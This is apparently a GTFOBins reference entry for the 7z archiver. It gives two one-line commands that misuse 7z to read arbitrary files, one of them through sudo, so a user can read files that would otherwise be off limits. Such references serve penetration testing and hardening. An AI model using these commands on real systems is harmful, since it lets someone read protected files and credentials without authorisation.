GTFOBins.github.io/_gtfobins/7z.md

237 B

functions
file-read sudo
code
LFILE=file_to_read 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
code
LFILE=file_to_read sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so